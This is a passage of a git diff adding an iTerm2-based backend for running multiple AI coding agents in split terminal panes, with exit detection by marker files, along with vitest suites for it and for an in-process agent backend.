expect(hoistedItermFocusSession).toHaveBeenCalledWith('sess-2'); + }); + + it('switchTo throws for unknown agent', async () => { + await backend.init(); + expect(() => backend.switchTo('ghost')).toThrow('not found'); + }); + + it('switchToNext and switchToPrevious cycle correctly', async () => { + await backend.init(); + + hoistedItermSplitPane.mockResolvedValueOnce('sess-1'); + await backend.spawnAgent(makeConfig('a')); + + hoistedItermSplitPane.mockResolvedValueOnce('sess-2'); + await backend.spawnAgent(makeConfig('b')); + + expect(backend.getActiveAgentId()).toBe('a'); + backend.switchToNext(); + expect(backend.getActiveAgentId()).toBe('b'); + backend.switchToNext(); + expect(backend.getActiveAgentId()).toBe('a'); + backend.switchToPrevious(); + expect(backend.getActiveAgentId()).toBe('b'); + }); + + it('switchToNext does nothing 
with a single agent', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('solo')); + backend.switchToNext(); + expect(backend.getActiveAgentId()).toBe('solo'); + }); + + it('switchToPrevious does nothing with a single agent', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('solo')); + backend.switchToPrevious(); + expect(backend.getActiveAgentId()).toBe('solo'); + }); + + // ─── Stop & Cleanup ────────────────────────────────────── + + it('stopAgent closes session and fires exit callback', async () => { + await backend.init(); + hoistedItermSplitPane.mockResolvedValueOnce('sess-1'); + await backend.spawnAgent(makeConfig('a')); + + const exitCallback = vi.fn(); + backend.setOnAgentExit(exitCallback); + + backend.stopAgent('a'); + + expect(hoistedItermCloseSession).toHaveBeenCalledWith('sess-1'); + expect(exitCallback).toHaveBeenCalledWith('a', 1, null); + }); + + it('stopAgent is a no-op for already-stopped agent', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('a')); + backend.stopAgent('a'); + hoistedItermCloseSession.mockClear(); + + backend.stopAgent('a'); + expect(hoistedItermCloseSession).not.toHaveBeenCalled(); + }); + + it('stopAgent is a no-op for unknown agent', async () => { + await backend.init(); + backend.stopAgent('ghost'); + expect(hoistedItermCloseSession).not.toHaveBeenCalled(); + }); + + it('stopAll closes all sessions and resets activeAgentId', async () => { + await backend.init(); + hoistedItermSplitPane.mockResolvedValueOnce('sess-1'); + await backend.spawnAgent(makeConfig('a')); + + hoistedItermSplitPane.mockResolvedValueOnce('sess-2'); + await backend.spawnAgent(makeConfig('b')); + + const exitCallback = vi.fn(); + backend.setOnAgentExit(exitCallback); + + backend.stopAll(); + + expect(hoistedItermCloseSession).toHaveBeenCalledTimes(2); + expect(exitCallback).toHaveBeenCalledTimes(2); + expect(backend.getActiveAgentId()).toBeNull(); + }); + + it('cleanup closes 
sessions and removes exit marker directory', async () => { + await backend.init(); + hoistedItermSplitPane.mockResolvedValueOnce('sess-1'); + await backend.spawnAgent(makeConfig('a')); + + await backend.cleanup(); + + expect(hoistedItermCloseSession).toHaveBeenCalledWith('sess-1'); + expect(hoistedFsRm).toHaveBeenCalledWith( + expect.stringContaining('agent-iterm-exit-'), + { recursive: true, force: true }, + ); + expect(backend.getActiveAgentId()).toBeNull(); + }); + + it('cleanup tolerates session close errors', async () => { + await backend.init(); + hoistedItermSplitPane.mockResolvedValueOnce('sess-1'); + await backend.spawnAgent(makeConfig('a')); + + hoistedItermCloseSession.mockRejectedValueOnce(new Error('session gone')); + + // Should not throw + await expect(backend.cleanup()).resolves.toBeUndefined(); + }); + + it('cleanup tolerates exit marker removal errors', async () => { + await backend.init(); + hoistedFsRm.mockRejectedValueOnce(new Error('ENOENT')); + + // Should not throw + await expect(backend.cleanup()).resolves.toBeUndefined(); + }); + + // ─── Exit Detection ───────────────────────────────────────── + + it('marks agent as exited when marker file appears', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('a')); + + const exitCallback = vi.fn(); + backend.setOnAgentExit(exitCallback); + + // Simulate marker file appearing with exit code 0 + hoistedFsReadFile.mockResolvedValue('0\n'); + + await vi.advanceTimersByTimeAsync(600); + + expect(exitCallback).toHaveBeenCalledWith('a', 0, null); + }); + + it('preserves non-zero exit codes from marker', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('a')); + + const exitCallback = vi.fn(); + backend.setOnAgentExit(exitCallback); + + hoistedFsReadFile.mockResolvedValue('42\n'); + + await vi.advanceTimersByTimeAsync(600); + + expect(exitCallback).toHaveBeenCalledWith('a', 42, null); + }); + + it('defaults to exit code 1 when marker contains NaN', async 
() => { + await backend.init(); + await backend.spawnAgent(makeConfig('a')); + + const exitCallback = vi.fn(); + backend.setOnAgentExit(exitCallback); + + hoistedFsReadFile.mockResolvedValue('garbage\n'); + + await vi.advanceTimersByTimeAsync(600); + + expect(exitCallback).toHaveBeenCalledWith('a', 1, null); + }); + + it('does not fire callback twice for the same agent', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('a')); + + const exitCallback = vi.fn(); + backend.setOnAgentExit(exitCallback); + + hoistedFsReadFile.mockResolvedValue('0\n'); + + await vi.advanceTimersByTimeAsync(600); + await vi.advanceTimersByTimeAsync(600); + + expect(exitCallback).toHaveBeenCalledTimes(1); + }); + + it('stops polling once all agents have exited', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('a')); + + hoistedFsReadFile.mockResolvedValue('0\n'); + + await vi.advanceTimersByTimeAsync(600); + + // Reset to track future reads + hoistedFsReadFile.mockClear(); + + // Advance more — should not poll anymore + await vi.advanceTimersByTimeAsync(2000); + expect(hoistedFsReadFile).not.toHaveBeenCalled(); + }); + + // ─── waitForAll ───────────────────────────────────────────── + + it('waitForAll resolves immediately when no agents exist', async () => { + await backend.init(); + const result = await backend.waitForAll(); + expect(result).toBe(true); + }); + + it('waitForAll resolves when all agents exit', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('a')); + + hoistedFsReadFile.mockResolvedValue('0\n'); + + const waitPromise = backend.waitForAll(); + await vi.advanceTimersByTimeAsync(600); + + const result = await waitPromise; + expect(result).toBe(true); + }); + + it('waitForAll returns false on timeout', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('a')); + + // Marker never appears (readFile keeps throwing) + const waitPromise = backend.waitForAll(1000); + await 
vi.advanceTimersByTimeAsync(1100); + + const result = await waitPromise; + expect(result).toBe(false); + }); + + // ─── Input ───────────────────────────────────────────────── + + it('writeToAgent sends text via itermSendText', async () => { + await backend.init(); + hoistedItermSplitPane.mockResolvedValueOnce('sess-1'); + await backend.spawnAgent(makeConfig('a')); + + const result = backend.writeToAgent('a', 'hello'); + expect(result).toBe(true); + expect(hoistedItermSendText).toHaveBeenCalledWith('sess-1', 'hello'); + }); + + it('writeToAgent returns false for unknown agent', async () => { + await backend.init(); + expect(backend.writeToAgent('ghost', 'hello')).toBe(false); + }); + + it('writeToAgent returns false for stopped agent', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('a')); + backend.stopAgent('a'); + + expect(backend.writeToAgent('a', 'hello')).toBe(false); + }); + + it('forwardInput delegates to active agent', async () => { + await backend.init(); + hoistedItermSplitPane.mockResolvedValueOnce('sess-1'); + await backend.spawnAgent(makeConfig('a')); + + const result = backend.forwardInput('hello'); + expect(result).toBe(true); + expect(hoistedItermSendText).toHaveBeenCalledWith('sess-1', 'hello'); + }); + + it('forwardInput returns false with no active agent', async () => { + await backend.init(); + expect(backend.forwardInput('hello')).toBe(false); + }); + + // ─── Snapshots ────────────────────────────────────────────── + + it('getActiveSnapshot returns null', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('a')); + expect(backend.getActiveSnapshot()).toBeNull(); + }); + + it('getAgentSnapshot returns null', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('a')); + expect(backend.getAgentSnapshot('a')).toBeNull(); + }); + + it('getAgentScrollbackLength returns 0', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('a')); + 
expect(backend.getAgentScrollbackLength('a')).toBe(0); + }); + + // ─── getAttachHint ────────────────────────────────────────── + + it('getAttachHint returns null', async () => { + await backend.init(); + expect(backend.getAttachHint()).toBeNull(); + }); + + // ─── resizeAll ────────────────────────────────────────────── + + it('resizeAll is a no-op', async () => { + await backend.init(); + // Should not throw + backend.resizeAll(80, 24); + }); + + // ─── type ─────────────────────────────────────────────────── + + it('has type "iterm2"', () => { + expect(backend.type).toBe('iterm2'); + }); +}); diff --git a/packages/core/src/agents/backends/ITermBackend.ts b/packages/core/src/agents/backends/ITermBackend.ts new file mode 100644 index 000000000..7ff24c44b --- /dev/null +++ b/packages/core/src/agents/backends/ITermBackend.ts @@ -0,0 +1,431 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview ITermBackend implements Backend using the it2 CLI + * (iTerm2 Python API). + * + * Each agent runs in its own iTerm2 split pane. The backend manages pane + * creation, exit detection (via exit marker file polling), and cleanup. + * + * Exit detection uses a file-based marker approach: each agent's command is + * wrapped to write its exit code to a temp file on completion, which the backend + * polls to detect exits. 
+ */ + +import * as fs from 'node:fs/promises'; +import * as path from 'node:path'; +import * as os from 'node:os'; +import { createDebugLogger } from '../../utils/debugLogger.js'; +import type { AnsiOutput } from '../../utils/terminalSerializer.js'; +import { DISPLAY_MODE } from './types.js'; +import type { AgentSpawnConfig, AgentExitCallback, Backend } from './types.js'; +import { + verifyITerm, + itermSplitPane, + itermRunCommand, + itermSendText, + itermFocusSession, + itermCloseSession, +} from './iterm-it2.js'; + +const debugLogger = createDebugLogger('ITERM_BACKEND'); + +/** Polling interval for exit detection (ms) */ +const EXIT_POLL_INTERVAL_MS = 500; + +interface ITermAgentSession { + agentId: string; + sessionId: string; + exitMarkerPath: string; + status: 'running' | 'exited'; + exitCode: number; +} + +export class ITermBackend implements Backend { + readonly type = DISPLAY_MODE.ITERM2; + + /** Directory for exit marker files */ + private exitMarkerDir: string; + /** Session ID of the last agent pane (split source) */ + private lastSplitSessionId: string | null = null; + + private sessions: Map = new Map(); + private agentOrder: string[] = []; + private activeAgentId: string | null = null; + private onExitCallback: AgentExitCallback | null = null; + private exitPollTimer: NodeJS.Timeout | null = null; + private initialized = false; + /** Number of agents currently being spawned asynchronously */ + private pendingSpawns = 0; + /** Queue to serialize spawn operations (prevents split race conditions) */ + private spawnQueue: Promise = Promise.resolve(); + + constructor() { + this.exitMarkerDir = path.join( + os.tmpdir(), + `agent-iterm-exit-${Date.now().toString(36)}`, + ); + } + + async init(): Promise { + if (this.initialized) return; + + await verifyITerm(); + + // Create the exit marker directory + await fs.mkdir(this.exitMarkerDir, { recursive: true }); + + this.initialized = true; + debugLogger.info('ITermBackend initialized'); + } + + // ─── Agent 
Lifecycle ──────────────────────────────────────── + + async spawnAgent(config: AgentSpawnConfig): Promise { + if (!this.initialized) { + throw new Error('ITermBackend not initialized. Call init() first.'); + } + if (this.sessions.has(config.agentId)) { + throw new Error(`Agent "${config.agentId}" already exists.`); + } + + const exitMarkerPath = path.join(this.exitMarkerDir, config.agentId); + await fs.mkdir(path.dirname(exitMarkerPath), { recursive: true }); + const cmd = this.buildShellCommand(config, exitMarkerPath); + + this.pendingSpawns++; + const spawnPromise = this.spawnQueue.then(() => + this.spawnAgentAsync(config.agentId, cmd, exitMarkerPath), + ); + this.spawnQueue = spawnPromise; + await spawnPromise; + } + + private async spawnAgentAsync( + agentId: string, + cmd: string, + exitMarkerPath: string, + ): Promise { + try { + let sessionId: string; + + if (this.sessions.size === 0) { + // First agent: split from ITERM_SESSION_ID if present, else active session + const leaderSessionId = process.env['ITERM_SESSION_ID'] || undefined; + sessionId = await itermSplitPane(leaderSessionId); + await itermRunCommand(sessionId, cmd); + } else { + // Subsequent agents: split from last agent session, else active session + sessionId = await itermSplitPane(this.lastSplitSessionId || undefined); + await itermRunCommand(sessionId, cmd); + } + + const agentSession: ITermAgentSession = { + agentId, + sessionId, + exitMarkerPath, + status: 'running', + exitCode: 0, + }; + + this.sessions.set(agentId, agentSession); + this.agentOrder.push(agentId); + this.lastSplitSessionId = sessionId; + + if (this.activeAgentId === null) { + this.activeAgentId = agentId; + } + + this.startExitPolling(); + + debugLogger.info(`Spawned agent "${agentId}" in session ${sessionId}`); + } catch (error) { + debugLogger.error(`Failed to spawn agent "${agentId}":`, error); + this.sessions.set(agentId, { + agentId, + sessionId: '', + exitMarkerPath, + status: 'exited', + exitCode: 1, + }); + 
this.agentOrder.push(agentId); + this.onExitCallback?.(agentId, 1, null); + } finally { + this.pendingSpawns--; + } + } + + stopAgent(agentId: string): void { + const session = this.sessions.get(agentId); + if (!session || session.status !== 'running') return; + itermCloseSession(session.sessionId).catch((e) => + debugLogger.error(`Failed to close session for agent "${agentId}": ${e}`), + ); + session.status = 'exited'; + session.exitCode = 1; + this.onExitCallback?.(agentId, 1, null); + debugLogger.info(`Closed iTerm2 session for agent "${agentId}"`); + } + + stopAll(): void { + for (const session of this.sessions.values()) { + if (session.status === 'running') { + itermCloseSession(session.sessionId).catch((e) => + debugLogger.error( + `Failed to close session for agent "${session.agentId}": ${e}`, + ), + ); + session.status = 'exited'; + session.exitCode = 1; + this.onExitCallback?.(session.agentId, 1, null); + } + } + this.activeAgentId = null; + } + + async cleanup(): Promise { + this.stopExitPolling(); + + // Close all iTerm2 sessions we created + for (const session of this.sessions.values()) { + if (!session.sessionId) continue; + try { + await itermCloseSession(session.sessionId); + } catch (error) { + debugLogger.error('Session cleanup error (ignored):', error); + } + } + + // Clean up exit marker files + try { + await fs.rm(this.exitMarkerDir, { + recursive: true, + force: true, + }); + } catch (error) { + debugLogger.error('Exit marker cleanup error (ignored):', error); + } + + this.sessions.clear(); + this.agentOrder = []; + this.activeAgentId = null; + this.lastSplitSessionId = null; + } + + setOnAgentExit(callback: AgentExitCallback): void { + this.onExitCallback = callback; + } + + async waitForAll(timeoutMs?: number): Promise { + if (this.allExited()) return true; + + return new Promise((resolve) => { + let timeoutHandle: NodeJS.Timeout | undefined; + + const checkInterval = setInterval(() => { + if (this.allExited()) { + 
clearInterval(checkInterval); + if (timeoutHandle) clearTimeout(timeoutHandle); + resolve(true); + } + }, EXIT_POLL_INTERVAL_MS); + + if (timeoutMs !== undefined) { + timeoutHandle = setTimeout(() => { + clearInterval(checkInterval); + resolve(false); + }, timeoutMs); + } + }); + } + + // ─── Active Agent & Navigation ────────────────────────────── + + switchTo(agentId: string): void { + if (!this.sessions.has(agentId)) { + throw new Error(`Agent "${agentId}" not found.`); + } + const session = this.sessions.get(agentId)!; + this.activeAgentId = agentId; + itermFocusSession(session.sessionId).catch((e) => + debugLogger.error(`Failed to focus session for agent "${agentId}": ${e}`), + ); + } + + switchToNext(): void { + if (this.agentOrder.length <= 1) return; + const currentIndex = this.agentOrder.indexOf(this.activeAgentId ?? ''); + const nextIndex = (currentIndex + 1) % this.agentOrder.length; + this.switchTo(this.agentOrder[nextIndex]!); + } + + switchToPrevious(): void { + if (this.agentOrder.length <= 1) return; + const currentIndex = this.agentOrder.indexOf(this.activeAgentId ?? 
''); + const prevIndex = + (currentIndex - 1 + this.agentOrder.length) % this.agentOrder.length; + this.switchTo(this.agentOrder[prevIndex]!); + } + + getActiveAgentId(): string | null { + return this.activeAgentId; + } + + // ─── Screen Capture ───────────────────────────────────────── + + getActiveSnapshot(): AnsiOutput | null { + // iTerm2 manages rendering — snapshots not supported + return null; + } + + getAgentSnapshot( + _agentId: string, + _scrollOffset: number = 0, + ): AnsiOutput | null { + return null; + } + + getAgentScrollbackLength(_agentId: string): number { + return 0; + } + + // ─── Input ────────────────────────────────────────────────── + + forwardInput(data: string): boolean { + if (!this.activeAgentId) return false; + return this.writeToAgent(this.activeAgentId, data); + } + + writeToAgent(agentId: string, data: string): boolean { + const session = this.sessions.get(agentId); + if (!session || session.status !== 'running') return false; + itermSendText(session.sessionId, data).catch((e) => + debugLogger.error(`Failed to send text to agent "${agentId}": ${e}`), + ); + return true; + } + + // ─── Resize ───────────────────────────────────────────────── + + resizeAll(_cols: number, _rows: number): void { + // iTerm2 manages pane sizes automatically + } + + getAttachHint(): string | null { + // iTerm2 panes are visible directly, no attach needed + return null; + } + + // ─── Private ──────────────────────────────────────────────── + + /** + * Build the shell command with exit marker wrapping. + * + * The command is wrapped so that its exit code is written to a temp file + * when it completes. This allows the backend to detect agent exit via + * file polling, since iTerm2 `write text` runs commands inside a shell + * (the shell stays alive after the command exits). 
+ */ + private buildShellCommand( + config: AgentSpawnConfig, + exitMarkerPath: string, + ): string { + const envParts: string[] = []; + if (config.env) { + for (const [key, value] of Object.entries(config.env)) { + if (!VALID_ENV_KEY.test(key)) { + throw new Error( + `Invalid environment variable name: "${key}". Names must match /^[A-Za-z_][A-Za-z0-9_]*$/.`, + ); + } + envParts.push(`${key}=${shellQuote(value)}`); + } + } + + const cmdParts = [ + shellQuote(config.command), + ...config.args.map(shellQuote), + ]; + + // Build: cd && [env K=V] command args; echo $? > + const parts = [`cd ${shellQuote(config.cwd)}`]; + if (envParts.length > 0) { + parts.push(`env ${envParts.join(' ')} ${cmdParts.join(' ')}`); + } else { + parts.push(cmdParts.join(' ')); + } + + const mainCmd = parts.join(' && '); + // Write exit code to a temp file first, then atomically rename it + // to the marker path. This prevents the polling loop from reading + // a partially-written file. + const tmpMarker = shellQuote(exitMarkerPath + '.tmp'); + const finalMarker = shellQuote(exitMarkerPath); + return `${mainCmd}; echo $? 
> ${tmpMarker} && mv ${tmpMarker} ${finalMarker}`; + } + + private allExited(): boolean { + if (this.pendingSpawns > 0) return false; + if (this.sessions.size === 0) return true; + for (const session of this.sessions.values()) { + if (session.status === 'running') return false; + } + return true; + } + + private startExitPolling(): void { + if (this.exitPollTimer) return; + + this.exitPollTimer = setInterval(() => { + void this.pollExitStatus(); + }, EXIT_POLL_INTERVAL_MS); + this.exitPollTimer.unref(); + } + + private stopExitPolling(): void { + if (this.exitPollTimer) { + clearInterval(this.exitPollTimer); + this.exitPollTimer = null; + } + } + + private async pollExitStatus(): Promise { + for (const agent of this.sessions.values()) { + if (agent.status !== 'running') continue; + + try { + const content = await fs.readFile(agent.exitMarkerPath, 'utf8'); + const exitCode = parseInt(content.trim(), 10); + agent.status = 'exited'; + agent.exitCode = isNaN(exitCode) ? 1 : exitCode; + + debugLogger.info( + `Agent "${agent.agentId}" exited with code ${agent.exitCode}`, + ); + + this.onExitCallback?.(agent.agentId, agent.exitCode, null); + } catch { + // File doesn't exist yet — command still running + } + } + + if (this.allExited()) { + this.stopExitPolling(); + } + } +} + +/** Regex for valid POSIX environment variable names */ +const VALID_ENV_KEY = /^[A-Za-z_][A-Za-z0-9_]*$/; + +/** + * Simple shell quoting for building command strings. + * Wraps value in single quotes, escaping any internal single quotes. 
+ */ +function shellQuote(value: string): string { + return `'${value.replace(/'/g, "'\\''")}'`; +} diff --git a/packages/core/src/agents/backends/InProcessBackend.test.ts b/packages/core/src/agents/backends/InProcessBackend.test.ts new file mode 100644 index 000000000..83bf1caca --- /dev/null +++ b/packages/core/src/agents/backends/InProcessBackend.test.ts @@ -0,0 +1,564 @@ +/** + * @license + * Copyright 2025 Qwen + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect, vi, beforeEach } from 'vitest'; +import { InProcessBackend } from './InProcessBackend.js'; +import { DISPLAY_MODE } from './types.js'; +import type { AgentSpawnConfig } from './types.js'; +import { AgentCore } from '../runtime/agent-core.js'; +import { createContentGenerator } from '../../core/contentGenerator.js'; + +// Mock createContentGenerator to avoid real API client setup +const mockContentGenerator = { + generateContentStream: vi.fn(), +}; +vi.mock('../../core/contentGenerator.js', () => ({ + createContentGenerator: vi.fn().mockResolvedValue({ + generateContentStream: vi.fn(), + }), +})); + +// Mock AgentCore and AgentInteractive to avoid real model calls +vi.mock('../runtime/agent-core.js', () => ({ + AgentCore: vi.fn().mockImplementation(() => ({ + subagentId: 'mock-id', + name: 'mock-agent', + eventEmitter: { + on: vi.fn(), + off: vi.fn(), + emit: vi.fn(), + }, + stats: { + start: vi.fn(), + getSummary: vi.fn().mockReturnValue({}), + }, + createChat: vi.fn().mockResolvedValue({}), + prepareTools: vi.fn().mockReturnValue([]), + runReasoningLoop: vi.fn().mockResolvedValue({ + text: 'Done', + terminateMode: null, + turnsUsed: 1, + }), + getEventEmitter: vi.fn().mockReturnValue({ + on: vi.fn(), + off: vi.fn(), + emit: vi.fn(), + }), + getExecutionSummary: vi.fn().mockReturnValue({}), + })), +})); + +function createMockToolRegistry() { + return { + getFunctionDeclarations: vi.fn().mockReturnValue([]), + getAllTools: vi.fn().mockReturnValue([]), + getAllToolNames: 
vi.fn().mockReturnValue([]), + registerTool: vi.fn(), + copyDiscoveredToolsFrom: vi.fn(), + stop: vi.fn().mockResolvedValue(undefined), + }; +} + +function createMockConfig() { + const registry = createMockToolRegistry(); + return { + getModel: vi.fn().mockReturnValue('test-model'), + getToolRegistry: vi.fn().mockReturnValue(registry), + getSessionId: vi.fn().mockReturnValue('test-session'), + getWorkingDir: vi.fn().mockReturnValue('/tmp'), + getTargetDir: vi.fn().mockReturnValue('/tmp'), + createToolRegistry: vi.fn().mockResolvedValue(createMockToolRegistry()), + getContentGenerator: vi.fn().mockReturnValue(mockContentGenerator), + getContentGeneratorConfig: vi.fn().mockReturnValue({ + model: 'test-model', + authType: 'openai', + apiKey: 'parent-key', + baseUrl: 'https://parent.example.com', + }), + getAuthType: vi.fn().mockReturnValue('openai'), + } as never; +} + +function createSpawnConfig(agentId: string): AgentSpawnConfig { + return { + agentId, + command: 'node', + args: [], + cwd: '/tmp', + inProcess: { + agentName: `Agent ${agentId}`, + initialTask: 'Do something', + runtimeConfig: { + promptConfig: { systemPrompt: 'You are a helpful assistant.' 
}, + modelConfig: { model: 'test-model' }, + runConfig: { max_turns: 10 }, + }, + }, + }; +} + +describe('InProcessBackend', () => { + let backend: InProcessBackend; + + beforeEach(() => { + backend = new InProcessBackend(createMockConfig()); + }); + + it('should have IN_PROCESS type', () => { + expect(backend.type).toBe(DISPLAY_MODE.IN_PROCESS); + }); + + it('should init without error', async () => { + await expect(backend.init()).resolves.toBeUndefined(); + }); + + it('should throw when spawning without inProcess config', async () => { + const config: AgentSpawnConfig = { + agentId: 'test', + command: 'node', + args: [], + cwd: '/tmp', + }; + + await expect(backend.spawnAgent(config)).rejects.toThrow( + 'InProcessBackend requires inProcess config', + ); + }); + + it('should spawn an agent with inProcess config', async () => { + await backend.init(); + await backend.spawnAgent(createSpawnConfig('agent-1')); + + expect(backend.getActiveAgentId()).toBe('agent-1'); + expect(backend.getAgent('agent-1')).toBeDefined(); + }); + + it('should set first spawned agent as active', async () => { + await backend.init(); + await backend.spawnAgent(createSpawnConfig('agent-1')); + await backend.spawnAgent(createSpawnConfig('agent-2')); + + expect(backend.getActiveAgentId()).toBe('agent-1'); + }); + + it('should navigate between agents', async () => { + await backend.init(); + await backend.spawnAgent(createSpawnConfig('agent-1')); + await backend.spawnAgent(createSpawnConfig('agent-2')); + await backend.spawnAgent(createSpawnConfig('agent-3')); + + expect(backend.getActiveAgentId()).toBe('agent-1'); + + backend.switchToNext(); + expect(backend.getActiveAgentId()).toBe('agent-2'); + + backend.switchToNext(); + expect(backend.getActiveAgentId()).toBe('agent-3'); + + // Wraps around + backend.switchToNext(); + expect(backend.getActiveAgentId()).toBe('agent-1'); + + backend.switchToPrevious(); + expect(backend.getActiveAgentId()).toBe('agent-3'); + }); + + it('should switch to a 
specific agent', async () => { + await backend.init(); + await backend.spawnAgent(createSpawnConfig('agent-1')); + await backend.spawnAgent(createSpawnConfig('agent-2')); + + backend.switchTo('agent-2'); + expect(backend.getActiveAgentId()).toBe('agent-2'); + }); + + it('should forward input to active agent', async () => { + await backend.init(); + await backend.spawnAgent(createSpawnConfig('agent-1')); + + const result = backend.forwardInput('hello'); + expect(result).toBe(true); + }); + + it('should return false for forwardInput with no active agent', () => { + expect(backend.forwardInput('hello')).toBe(false); + }); + + it('should write to specific agent', async () => { + await backend.init(); + await backend.spawnAgent(createSpawnConfig('agent-1')); + + expect(backend.writeToAgent('agent-1', 'hello')).toBe(true); + expect(backend.writeToAgent('nonexistent', 'hello')).toBe(false); + }); + + it('should return null for screen capture methods', async () => { + await backend.init(); + await backend.spawnAgent(createSpawnConfig('agent-1')); + + expect(backend.getActiveSnapshot()).toBeNull(); + expect(backend.getAgentSnapshot('agent-1')).toBeNull(); + expect(backend.getAgentScrollbackLength('agent-1')).toBe(0); + }); + + it('should return null for attach hint', () => { + expect(backend.getAttachHint()).toBeNull(); + }); + + it('should stop a specific agent', async () => { + await backend.init(); + await backend.spawnAgent(createSpawnConfig('agent-1')); + + const agent = backend.getAgent('agent-1'); + expect(agent).toBeDefined(); + + backend.stopAgent('agent-1'); + // Agent should eventually reach cancelled state + }); + + it('should stop all agents', async () => { + await backend.init(); + await backend.spawnAgent(createSpawnConfig('agent-1')); + await backend.spawnAgent(createSpawnConfig('agent-2')); + + backend.stopAll(); + // Both agents should be aborted + }); + + it('should cleanup all agents', async () => { + await backend.init(); + await 
backend.spawnAgent(createSpawnConfig('agent-1')); + + await backend.cleanup(); + + expect(backend.getActiveAgentId()).toBeNull(); + expect(backend.getAgent('agent-1')).toBeUndefined(); + }); + + it('should fire exit callback when agent completes', async () => { + await backend.init(); + + const exitCallback = vi.fn(); + backend.setOnAgentExit(exitCallback); + + await backend.spawnAgent(createSpawnConfig('agent-1')); + + // The mock agent stays idle after processing initialTask. + // Trigger a graceful shutdown to make it complete. + const agent = backend.getAgent('agent-1'); + expect(agent).toBeDefined(); + await agent!.shutdown(); + + // Wait for the exit callback to fire + await vi.waitFor(() => { + expect(exitCallback).toHaveBeenCalledWith( + 'agent-1', + expect.any(Number), + null, + ); + }); + }); + + it('should pass per-agent cwd to AgentCore via config proxy', async () => { + const parentConfig = createMockConfig(); + const backendWithParentCwd = new InProcessBackend(parentConfig); + await backendWithParentCwd.init(); + + const agentCwd = '/worktree/agent-1'; + const config = createSpawnConfig('agent-1'); + config.cwd = agentCwd; + + await backendWithParentCwd.spawnAgent(config); + + const MockAgentCore = AgentCore as unknown as ReturnType; + const lastCall = MockAgentCore.mock.calls.at(-1); + expect(lastCall).toBeDefined(); + + // Second arg is the runtime context (Config) + const agentContext = lastCall![1] as { + getWorkingDir: () => string; + getTargetDir: () => string; + getToolRegistry: () => unknown; + }; + expect(agentContext.getWorkingDir()).toBe(agentCwd); + expect(agentContext.getTargetDir()).toBe(agentCwd); + expect(agentContext.getToolRegistry()).toBeDefined(); + }); + + it('should propagate runConfig limits to AgentInteractive', async () => { + await backend.init(); + + const config = createSpawnConfig('agent-1'); + config.inProcess!.runtimeConfig.runConfig = { + max_turns: 5, + max_time_minutes: 10, + }; + + await backend.spawnAgent(config); + 
+ const agent = backend.getAgent('agent-1'); + expect(agent).toBeDefined(); + expect(agent!.config.maxTurnsPerMessage).toBe(5); + expect(agent!.config.maxTimeMinutesPerMessage).toBe(10); + }); + + it('should default limits to undefined when runConfig omits them', async () => { + await backend.init(); + + const config = createSpawnConfig('agent-1'); + config.inProcess!.runtimeConfig.runConfig = {}; + + await backend.spawnAgent(config); + + const agent = backend.getAgent('agent-1'); + expect(agent).toBeDefined(); + expect(agent!.config.maxTurnsPerMessage).toBeUndefined(); + expect(agent!.config.maxTimeMinutesPerMessage).toBeUndefined(); + }); + + it('should give each agent its own cwd even when sharing a backend', async () => { + await backend.init(); + + const config1 = createSpawnConfig('agent-1'); + config1.cwd = '/worktree/agent-1'; + const config2 = createSpawnConfig('agent-2'); + config2.cwd = '/worktree/agent-2'; + + await backend.spawnAgent(config1); + await backend.spawnAgent(config2); + + const MockAgentCore = AgentCore as unknown as ReturnType; + const calls = MockAgentCore.mock.calls; + + const ctx1 = calls.at(-2)![1] as { + getWorkingDir: () => string; + getTargetDir: () => string; + }; + const ctx2 = calls.at(-1)![1] as { + getWorkingDir: () => string; + getTargetDir: () => string; + }; + + expect(ctx1.getWorkingDir()).toBe('/worktree/agent-1'); + expect(ctx1.getTargetDir()).toBe('/worktree/agent-1'); + expect(ctx2.getWorkingDir()).toBe('/worktree/agent-2'); + expect(ctx2.getTargetDir()).toBe('/worktree/agent-2'); + }); + + it('should throw when spawning a duplicate agent ID', async () => { + await backend.init(); + await backend.spawnAgent(createSpawnConfig('agent-1')); + + await expect( + backend.spawnAgent(createSpawnConfig('agent-1')), + ).rejects.toThrow('Agent "agent-1" already exists.'); + }); + + it('should fire exit callback with code 1 when start() throws', async () => { + // Make createChat throw for this test + const MockAgentCore = 
AgentCore as unknown as ReturnType; + MockAgentCore.mockImplementationOnce(() => ({ + subagentId: 'mock-id', + name: 'mock-agent', + eventEmitter: { + on: vi.fn(), + off: vi.fn(), + emit: vi.fn(), + }, + stats: { + start: vi.fn(), + getSummary: vi.fn().mockReturnValue({}), + }, + createChat: vi.fn().mockRejectedValue(new Error('Auth failed')), + prepareTools: vi.fn().mockReturnValue([]), + getEventEmitter: vi.fn().mockReturnValue({ + on: vi.fn(), + off: vi.fn(), + emit: vi.fn(), + }), + getExecutionSummary: vi.fn().mockReturnValue({}), + })); + + await backend.init(); + + const exitCallback = vi.fn(); + backend.setOnAgentExit(exitCallback); + + // spawnAgent should NOT throw — it catches the error internally + await expect( + backend.spawnAgent(createSpawnConfig('agent-fail')), + ).resolves.toBeUndefined(); + + // Exit callback should have been fired with exit code 1 + expect(exitCallback).toHaveBeenCalledWith('agent-fail', 1, null); + }); + + it('should return true immediately from waitForAll after cleanup', async () => { + await backend.init(); + await backend.spawnAgent(createSpawnConfig('agent-1')); + + await backend.cleanup(); + + // waitForAll should return immediately after cleanup + const result = await backend.waitForAll(5000); + expect(result).toBe(true); + }); + + describe('chat history', () => { + it('should pass chatHistory to AgentInteractive config', async () => { + await backend.init(); + + const chatHistory = [ + { role: 'user' as const, parts: [{ text: 'prior question' }] }, + { role: 'model' as const, parts: [{ text: 'prior answer' }] }, + ]; + const config = createSpawnConfig('agent-1'); + config.inProcess!.chatHistory = 